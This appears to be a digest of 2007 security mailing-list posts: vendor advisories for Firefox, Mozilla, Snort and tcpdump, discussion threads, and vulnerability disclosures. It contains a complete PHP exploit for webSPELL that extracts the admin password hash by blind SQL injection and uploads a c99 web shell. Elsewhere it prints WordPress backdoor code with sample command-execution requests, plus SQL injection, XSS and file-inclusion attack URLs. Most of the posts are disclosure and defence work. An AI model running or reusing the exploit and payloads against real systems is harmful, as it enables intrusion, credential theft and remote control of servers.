Re: SPAW Editor PHP Edition
In article <[EMAIL PROTECTED]>, RaeD Hasadya <[EMAIL PROTECTED]> wrote: >Remote IInclude File : SPAW Editor PHP Edition upgrade version 1.2.3 to 1.2.4 > >Discovered By : Hasadya Raed >Contact Me : RaeD[at]BsdMail[dot]Com >Download Script: >http://heanet.dl.sourceforge.net/sourceforge/spaw/spaw-php-123-to-124.zip > >B.File :img_library.php : >include $spaw_root.'class/util.class.php'; >include $spaw_root.'class/lang.class.php'; > >=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*= > >Expl:-http://www.victim.com/spaw/dialogs/img_library.php?spaw_root=[Shell-AttacK] Besides being for an older version, this is only a problem if you haven't correctly installed the package (i.e. created the spaw_control.config.php file that defines spaw_root. This advisory is about >< that close to being purely bogus. (I don't even use spaw, I just had to go peek.) -- Steve Watt KD6GGD PP-ASEL-IA ICBM: 121W 56' 57.5" / 37N 20' 15.3" Internet: steve @ Watt.COM Whois: SW32-ARIN Free time? There's no such thing. It just comes in varying prices...
[ GLSA 200703-05 ] Mozilla Suite: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200703-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Mozilla Suite: Multiple vulnerabilities Date: March 03, 2007 Bugs: #135257 ID: 200703-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Several vulnerabilities exist in the Mozilla Suite, which is no longer supported by the Mozilla project. Background == The Mozilla Suite is a popular all-in-one web browser that includes a mail and news reader. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-client/mozilla <= 1.7.13 Vulnerable! 2 www-client/mozilla-bin <= 1.7.13 Vulnerable! --- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. --- 2 affected packages on all of their supported architectures. --- Description === Several vulnerabilities ranging from code execution with elevated privileges to information leaks affect the Mozilla Suite. Impact == A remote attacker could entice a user to browse to a specially crafted website or open a specially crafted mail that could trigger some of the vulnerabilities, potentially allowing execution of arbitrary code, denials of service, information leaks, or cross-site scripting attacks leading to the robbery of cookies of authentication credentials. Workaround == Most of the issues, but not all of them, can be prevented by disabling the HTML rendering in the mail client and JavaScript on every application. Resolution == The Mozilla Suite is no longer supported and has been masked after some necessary changes on all the other ebuilds which used to depend on it. Mozilla Suite users should unmerge www-client/mozilla or www-client/mozilla-bin, and switch to a supported product, like SeaMonkey, Thunderbird or Firefox. # emerge --unmerge "www-client/mozilla" # emerge --unmerge "www-client/mozilla-bin" References == [ 1 ] Official Advisory http://www.mozilla.org/projects/security/known-vulnerabilities.html#Mozilla Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-05.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpYynq9NahPV.pgp Description: PGP signature
ERRATA: [ GLSA 200703-01 ] Snort: Remote execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory [ERRATA UPDATE]GLSA 200703-01:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Snort: Remote execution of arbitrary code Date: February 23, 2007 Updated: March 02, 2007 Bugs: #167730 ID: 200703-01:02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Errata == The initial workaround provided by the GLSA does not avoid the mentioned vulnerability. The corrected section appears below. Workaround == Disable the DCE/RPC processor by commenting the 'preprocessor dcerpc' section in /etc/snort/snort.conf . Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-01.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgp8SPfYpHaVg.pgp Description: PGP signature
Re: Xbox 360 Hypervisor Privilege Escalation Vulnerability
We have discovered a vulnerability in the Xbox 360 hypervisor that allows privilege escalation into hypervisor mode. Together with a method to inject data into non-privileged memory areas, this vulnerability allows an attacker with physical access to an Xbox 360 to run arbitrary code such as alternative operating systems with full privileges and full hardware access. Great Scott ... no wonder Microsoft is terrified! Do you realize what this means?? It means Solaris 10 on the XBox 360 ... a dream come true!! :-)
Re: VMware Workstation multiple denial of service and isolation manipulation vulnerabilities
This problem seems to occur on vmware server/Linux as well. I've discovered this issue with in W2k3 Terminal Server with a "Domain User" being able to "unplug" the network device.
[Fwd: Re: Angel LMS 7.1 - Remote SQL Injection]
--- Begin Message --- http://www.milw0rm.com/exploits/3390 Plagiarism sucks. So does altering source code before you post it on your website. http://kernelspace.us/itheft.c http://www.milw0rm.com/exploits/3383 --- End Message ---
rPSA-2007-0040-3 firefox thunderbird
rPath Security Advisory: 2007-0040-3 Published: 2007-02-26 Updated: 2007-02-26 Correctly formatted CVE URLs 2007-03-03 Added newly-release thunderbird packages to advisory Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: firefox=/[EMAIL PROTECTED]:devel//1/1.5.0.10-0.1-1 thunderbird=/[EMAIL PROTECTED]:devel//1/1.5.0.10-0.1-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6077 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0008 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0009 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0776 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0778 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0779 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0780 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0800 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0995 https://issues.rpath.com/browse/RPL-1081 https://issues.rpath.com/browse/RPL-1103 Description: Previous versions of the firefox package are vulnerable to several types of attacks, some of which are understood to allow compromised or malicious sites to run arbitrary code as the user running the firefox browser. 2 March 2007 Update: The vulnerabilities previously resolved in the firefox have now been resolved in the thunderbird package as well.
Re: Evading the Norman SandBox Analyzer
This is the same as the results found > 2 years ago as published by Joanna Rutkowska as RedPill (http://invisiblethings.org/papers/ redpill.html) (and before that in a Usenix paper) and therefore everyone who is interested in emulated/virtualized security already knows that SIDT is a problem instruction. John On Feb 28, 2007, at 11:36 AM, Arne Vidstrom wrote: Hi all, Summary: The Norman SandBox Analyzer (http://sandbox.norman.no/live.html) runs malicious code samples in an emulated environment while logging their actions. In practice it is more or less impossible to make an emulated environment perfectly similar to the real thing. It is therefore possible to write malicious code that does not behave maliciously when run in the Sandbox Analyzer. Here I will give one example of such a technique. Full text at: http://www.ntsecurity.nu/onmymind/2007/2007-02-27.html I have notified Norman about the problem but have chosen not to wait for them to patch it. The reason being that this is not a regular vulnerability, but rather an example of an inherent weakness in emulated sandboxes in general. I assume they will patch this particular case shortly though since it should be very easy to do. Regards /Arne http://ntsecurity.nu http://vidstrom.net
Re: Evading the Norman SandBox Analyzer
Hi, Yes, the same instruction is used, but no, this is not the same thing at all. In the SandBox Analyzer case the problem is that the limit is set to a value which is not according to the Intel specification, which in turn singles out the SandBox Analyzer. The RedPill technique works because in the virtualization the SIDT instruction is emulated in ring 0 but run straight on the processor in ring 3. Therefore SIDT in ring 3 reveals the address of another IDT than the one the OS thinks is in use. In a true emulator there is no reason why the SIDT instruction should give different results in ring 0 and ring 3, because everything is emulated both in ring 0 and ring 3. And especially there is no reason why the limit should be for example 800h instead of 7ffh. That is not a problem with the emulator in itself, but a problem with the "OS" running inside the emulator. Which, again, is not the same problem as the one RedPill uses. So no, this has not already been published > 2 years ago. /Arne John Smith skrev: This is the same as the results found > 2 years ago as published by Joanna Rutkowska as RedPill (http://invisiblethings.org/papers/redpill.html) (and before that in a Usenix paper) and therefore everyone who is interested in emulated/virtualized security already knows that SIDT is a problem instruction. John On Feb 28, 2007, at 11:36 AM, Arne Vidstrom wrote: Hi all, Summary: The Norman SandBox Analyzer (http://sandbox.norman.no/live.html) runs malicious code samples in an emulated environment while logging their actions. In practice it is more or less impossible to make an emulated environment perfectly similar to the real thing. It is therefore possible to write malicious code that does not behave maliciously when run in the Sandbox Analyzer. Here I will give one example of such a technique. Full text at: http://www.ntsecurity.nu/onmymind/2007/2007-02-27.html I have notified Norman about the problem but have chosen not to wait for them to patch it. The reason being that this is not a regular vulnerability, but rather an example of an inherent weakness in emulated sandboxes in general. I assume they will patch this particular case shortly though since it should be very easy to do. Regards /Arne http://ntsecurity.nu http://vidstrom.net
BJ Webring XSS
* BJ Webring XSS * By : sn0oPy * Risk : high * exploit : just inject any script on the add link menu : http://www.target.ma/webring/formulaire.php Dork : intitle:".: index webring :." * contact : [EMAIL PROTECTED] * greetz : [subzero], http://forums.avenir-geopolitique.net. reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2707
Tyger Bug Tracking System Multiple Vulnerability
-=[ADVISORY---]=- Tyger Bug Tracking System Author: CorryL[EMAIL PROTECTED] -=[---]=- -=[+] Application:Tyger Bug Tracking System -=[+] Version:1.1.3 -=[+] Vendor's URL: http://uk.homeunix.org/tyger/cms/ -=[+] Platform: Windows\Linux\Unix -=[+] Bug type: Cross-Site Script\Sql injection -=[+] Exploitation: Remote -=[-] -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~ -=[+] Reference: www.xoned.net -=[+] Virtual Office: http://www.kasamba.com/CorryL -=[+] Irc Chan: irc.darksin.net #x0n3-h4ck ..::[ Descriprion ]::.. Tyger Bug tracking software has been designed and developed or individuals or groups of software developers to manage software development better. By using Tyger teams of developers are able to communicate far better with each fellow developers or end user's which ultimately improves the quality of your software project or product. ..::[ Proof Of Concept ]::.. [Sql injection] http://remote_server/ViewBugs.php?s=[sql]&o=ASC [Xss] http://remote_server/Login.php/>">[XSS] http://remote_server/Register.php/>">[XSS]
rPSA-2007-0048-1 tcpdump
rPath Security Advisory: 2007-0048-1 Published: 2007-03-03 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Remote User Deterministic Denial of Service Updated Versions: tcpdump=/[EMAIL PROTECTED]:devel//1/3.9.5-0.1-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1218 https://issues.rpath.com/browse/RPL-1100 Description: Previous versions of the tcpdump package are vulnerable to a remote denial of service when printing 802.11 ethernet frames, only if the link type was specified explicitly on the tcpdump command line. No unauthorized access is understood to be enabled by this vulnerability.
[ GLSA 200703-04 ] Mozilla Firefox: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200703-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Mozilla Firefox: Multiple vulnerabilities Date: March 02, 2007 Bugs: #16 ID: 200703-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities have been reported in Mozilla Firefox, some of which may allow user-assisted arbitrary remote code execution. Background == Mozilla Firefox is a popular open-source web browser from the Mozilla Project. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-client/mozilla-firefox < 2.0.0.2*>= 1.5.0.10 >= 2.0.0.2 2 www-client/mozilla-firefox-bin < 2.0.0.2*>= 1.5.0.10 >= 2.0.0.2 --- 2 affected packages on all of their supported architectures. --- Description === Tom Ferris reported a heap-based buffer overflow involving wide SVG stroke widths that affects Mozilla Firefox 2 only. Various researchers reported some errors in the JavaScript engine potentially leading to memory corruption. Mozilla Firefox also contains minor vulnerabilities involving cache collision and unsafe pop-up restrictions, filtering or CSS rendering under certain conditions. Impact == An attacker could entice a user to view a specially crafted web page that will trigger one of the vulnerabilities, possibly leading to the execution of arbitrary code. It is also possible for an attacker to spoof the address bar, steal information through cache collision, bypass the local files protection mechanism with pop-ups, or perform cross-site scripting attacks, leading to the exposure of sensitive information, like user credentials. Workaround == There is no known workaround at this time for all of these issues, but most of them can be avoided by disabling JavaScript. Resolution == Users upgrading to the following releases of Mozilla Firefox should note that this upgrade has been found to lose the saved passwords file in some cases. The saved passwords are encrypted and stored in the 'signons.txt' file of ~/.mozilla/ and we advise our users to save that file before performing the upgrade. All Mozilla Firefox 1.5 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-1.5.0.10" All Mozilla Firefox 1.5 binary users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-bin-1.5.0.10" All Mozilla Firefox 2.0 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-2.0.0.2" All Mozilla Firefox 2.0 binary users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-bin-2.0.0.2" References == [ 1 ] CVE-2006-6077 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6077 [ 2 ] CVE-2007-0775 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775 [ 3 ] CVE-2007-0776 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0776 [ 4 ] CVE-2007-0777 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777 [ 5 ] CVE-2007-0778 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0778 [ 6 ] CVE-2007-0779 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0779 [ 7 ] CVE-2007-0780 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0780 [ 8 ] CVE-2007-0800 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0800 [ 9 ] CVE-2007-0801 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0801 [ 10 ] CVE-2007-0981 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981 [ 11 ] CVE-2007-0995 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0995 [ 12 ] Mozilla password loss bug https://bugzilla.mozilla.org/show_bug.cgi?id=360493#c366 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200703-04.xml Concerns? = Security is a primary focus of Gentoo Linux a
webSPELL <= 4.01.02 Remote PHP Code Execution Exploit
#!/usr/bin/php
http://localhost/webspell4.01.02/downloads/c99shell.php)
#
if($argc < 5)
{
print ("
-- webSPELL <= 4.01.02 Remote PHP Code Execution Exploit --
---
PHP conditions: register_globals=On
Credits: DarkFig <[EMAIL PROTECTED]>
URL: http://www.acid-root.new.fr/
---
Usage: $argv[0] -url <> -file <> [Options]
Params: -url For example http://victim.com/webspell/
-file The file you wanna upload (c99shell.php...)
Options: -prefixTable prefix (default=webs)
-upmatch The match which returns TRUE for the upload
-sqlmatch The match which returns TRUE for the SQL injection
-proxy If you wanna use a proxy
-proxyauth Basic authentification
Example: $argv[0] -url http://localhost/webspell/ -file c99shell.php
---
");exit(1);
}
$url= getparam('url',1);
$file = getparam('file',1);
$prfix = (getparam('prefix')!='') ? getparam('prefix') : 'webs';
$match_upload = (getparam('upmatch')!='') ? getparam('upmatch') :
'\;URL\=index\.php\?site\=files\&file\=';
$match_blindsql = (getparam('sqlmatch')!='') ? getparam('sqlmatch') :
'site\=profile\&id\=';
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if($proxy) $xpl->proxy($proxy);
if($authp) $xpl->proxyauth($authp);
print "\nAdmin id: ";
$userid = blind('userID');
print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));
print "\nLogged in (ws_auth=$userid%3A$passwd)";
$xpl->addcookie("ws_auth",$userid."%3A".$passwd);
# File upload vulnerability
#
# +files.php
# |
# 42. $action = $_GET['action'];
# 43. if($action=="save") {
# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no
access!", "3"));
# 46. $upfile = $_FILES[upfile];
# 69. $filepath = "./downloads/";
# 71. $des_file = $filepath.$upfile[name];
# 72. if(!file_exists($des_file)) {
# 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) {
#
print "\nTrying to upload the malicious file";
$frmdt = array(frmdt_url => $url.'index.php?site=files&action=save',
"fileurl" => 1,
"upfile" => array(frmdt_filename => basename($file),
frmdt_content => file_get_contents($file)));
$xpl->formdata($frmdt);
if(preg_match("#$match_upload#si",$xpl->getcontent())) print "\nDone";
else print "\nFailed";
print " (${url}downloads/".basename($file).")\n";
# Simple blind SQL injection (register_globals=On)
#
# +members.php
# |
# 31. if($_GET['action']=="show") {
# 32. if($_GET['squadID']) {
# 33. $getsquad = 'WHERE squadID="'.$_GET['squadID'].'"';
# 34. }
# 36. $ergebnis=safe_query("SELECT * FROM ".PREFIX."squads ".$getsquad." ORDER
BY sort");
#
function blind($field)
{
global $prfix,$xpl,$url,$match_blindsql;
$d=0; $v='';
if(!eregi('p',$field)) { $b=47;$c=57; } # 0-9
else { $b=47;$c=70; } # 0-9a-z
while(TRUE)
{
$d++;
for($e=$b;$e<=$c;$e++)
{
if($e==47) $f='NULL';
else $f=$e;
$sql = "WHERE SUBSTR((SELECT $field FROM ${prfix}_user
WHERE userID="
."(SELECT userID FROM ${prfix}_user_groups WHERE
files=1 LIMIT 1)"
." LIMIT 1),$d,1)=CHAR($f)";
$xpl->get($url."index.php?site=members&action=show&getsquad=".urlencode($sql));
if(preg_match("#$match_blindsql#",$xpl->getcontent(),$matches))
{
if($e==47)
{
return $v;
}
else
{
print strtolower(chr($f));
$v .= chr($f);
break;
}
}
}
}
}
function getparam($param,$opt='')
{
global $argv;
foreach($argv as $value => $key)
{
if($key == '-'.$param) return $argv[$value+1];
}
if($opt) exit("\n-$param parameter required");
else return;
}
if(!function_exists('file_get_contents')) {
function file_get_contents($file)
{
$handle = fopen($file, "r");
$content = fread($fd, filesize($file));
fclose($handle);
return $content;
}
}
?>
WordPress source code compromised to enable remote code execution
While assessing the security of WordPress, a popular blog creation software, I
have discovered that it's source code has recently been compromised by a third
party in order to enable remote command execution on the machines running
affected versions. The compromised files are wp-includes/feed.php and
wp-includes/theme.php.
The following code has been added:
in wp-includes/feed.php
function comment_text_phpfilter($filterdata) {
eval($filterdata);
}
...
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
in wp-includes/theme.php
function get_theme_mcommand($mcds) {
passthru($mcds);
}
...
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
this would enable remote command execution on machines running compromised
versions, for example
http://wordpressurl/wp-includes/feed.php?ix=phpinfo();
http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd
I have discovered this vulnerability on Friday, March 2nd 2007 and contacted
WordPress about it straight away. They reacted promptly by disabling downloads
until further investigation. Later they determined that ony one of two servers
has been compromised and that the two files mentioned above are the only ones
changed.
It seems that the above files were changed on Feb 25th, 2007, so if you
downloaded WordPress between Feb 25th, 2007 and Mar 2nd 2007 it is possible
that you are running a compromised version, so be sure to check for the above
code.
Discovered and reported by Ivan Fratric
http://ifsec.blogspot.com
Thanks to Ryan Boren of WordPress for quick response and his feedback regarding
this issue.
[ MDKSA-2007:050-1 ] - Updated Firefox packages fix multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:050-1 http://www.mandriva.com/security/ ___ Package : mozilla-firefox Date: March 2, 2007 Affected: 2007.0, Corporate 3.0, Corporate 4.0 ___ Problem Description: A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Firefox program, version 1.5.0.10. This update provides the latest Firefox to correct these issues. Update: A regression was found in the latest Firefox packages provided where changes to library paths caused applications that depended on the NSS libraries (such as Thunderbird and Evolution) to fail to start or fail to load certain SSL-related security components. These new packages correct that problem and we apologize for any inconvenience the previous update may have caused. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6077 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0008 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0009 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0775 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0778 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0779 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0780 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0800 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0981 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0995 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0996 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1092 http://www.mozilla.org/security/announce/2007/mfsa2007-01.html http://www.mozilla.org/security/announce/2007/mfsa2007-02.html http://www.mozilla.org/security/announce/2007/mfsa2007-03.html http://www.mozilla.org/security/announce/2007/mfsa2007-04.html http://www.mozilla.org/security/announce/2007/mfsa2007-05.html http://www.mozilla.org/security/announce/2007/mfsa2007-06.html http://www.mozilla.org/security/announce/2007/mfsa2007-07.html http://www.mozilla.org/security/announce/2007/mfsa2007-08.html ___ Updated Packages: Mandriva Linux 2007.0: 411bc0bdd8dc32950a84c77ed3319508 2007.0/i586/libmozilla-firefox1.5.0.10-1.5.0.10-2mdv2007.0.i586.rpm 9ceb031931003fb861882f4455c6648b 2007.0/i586/libmozilla-firefox1.5.0.10-devel-1.5.0.10-2mdv2007.0.i586.rpm db615eadf763927182c8657d11b1ae54 2007.0/i586/libnspr4-1.5.0.10-2mdv2007.0.i586.rpm bd7dca3e972f552b5dd347822e17f1e1 2007.0/i586/libnspr4-devel-1.5.0.10-2mdv2007.0.i586.rpm bb4709aa4bf277e32c25e07d93641802 2007.0/i586/libnspr4-static-devel-1.5.0.10-2mdv2007.0.i586.rpm babf7d44d0340cd51f45249d3002180e 2007.0/i586/libnss3-1.5.0.10-2mdv2007.0.i586.rpm 19a967982b748b879b1904d5bcea174d 2007.0/i586/libnss3-devel-1.5.0.10-2mdv2007.0.i586.rpm 6333bab7a5d530836fa5a64383bcdd30 2007.0/i586/mozilla-firefox-1.5.0.10-2mdv2007.0.i586.rpm 72672b4bbfcc4f13d5820a4c11bca547 2007.0/SRPMS/mozilla-firefox-1.5.0.10-2mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 9fe9779d9d02f0aa73d28096cc237d00 2007.0/x86_64/lib64mozilla-firefox1.5.0.10-1.5.0.10-2mdv2007.0.x86_64.rpm 3c0a879b450f5c2569eb81d397a82906 2007.0/x86_64/lib64mozilla-firefox1.5.0.10-devel-1.5.0.10-2mdv2007.0.x86_64.rpm 338d81330e754d5ffd22dea67c2fbfd2 2007.0/x86_64/lib64nspr4-1.5.0.10-2mdv2007.0.x86_64.rpm 0c840ec9a78c48d975db6bca80e53caa 2007.0/x86_64/lib64nspr4-devel-1.5.0.10-2mdv2007.0.x86_64.rpm 3f1ba2da63bf990b3958f184bdf4d96f 2007.0/x86_64/lib64nspr4-static-devel-1.5.0.10-2mdv2007.0.x86_64.rpm cd9ef9efe9f859467a07bfc20899156d 2007.0/x86_64/lib64nss3-1.5.0.10-2mdv2007.0.x86_64.rpm d6243e7d7c76a5ff5a418f7304cdcff2 2007.0/x86_64/lib64nss3-devel-1.5.0.10-2mdv2007.0.x86_64.rpm 0fec2d70c6a797521304598b802d03b1 2007.0/x86_64/mozilla-firefox-1.5.0.10-2mdv2007.0.x86_64.rpm 72672b4bbfcc4f13d5820a4c11bca547 2007.0/SRPMS/mozilla-firefox-1.5.0.10-2mdv2007.0.src.rpm Corporate 3.0: 24fbf58752279b3a5ec8d186d7c6142b corporate/3.0/i586/libnspr4-1.5.0.10-1.1.C30mdk.i586.rpm cc59dd85bcdc065ed4ee7f3d299e971a corporate/3.0/i586/libnspr4-devel-1.5.0.10-1.1.C30mdk.i586.rpm 284b6bf1210fb854361a9af3062528e1 corporate/3.0/i586/libnspr4-static-devel-1.5.0.10-1.1.C30mdk.i586.rpm cf17ffa7ff1734b850c7f7a5b7f780ee corporate/3.0/i586/libnss3-1.5.0.10-1.1.C30mdk.i586.rpm 82e74bce4abb564958d0225bc94687d6 corporate/3.0/i586/libnss3-devel-1.5.0.10-1.1.C30mdk.i586.rpm 5af5da7a1f51c609568f03b2026c0687 corporate/3.0/i586/mozilla-firefox-1.5.0.10-1.1.C30mdk.i586.r
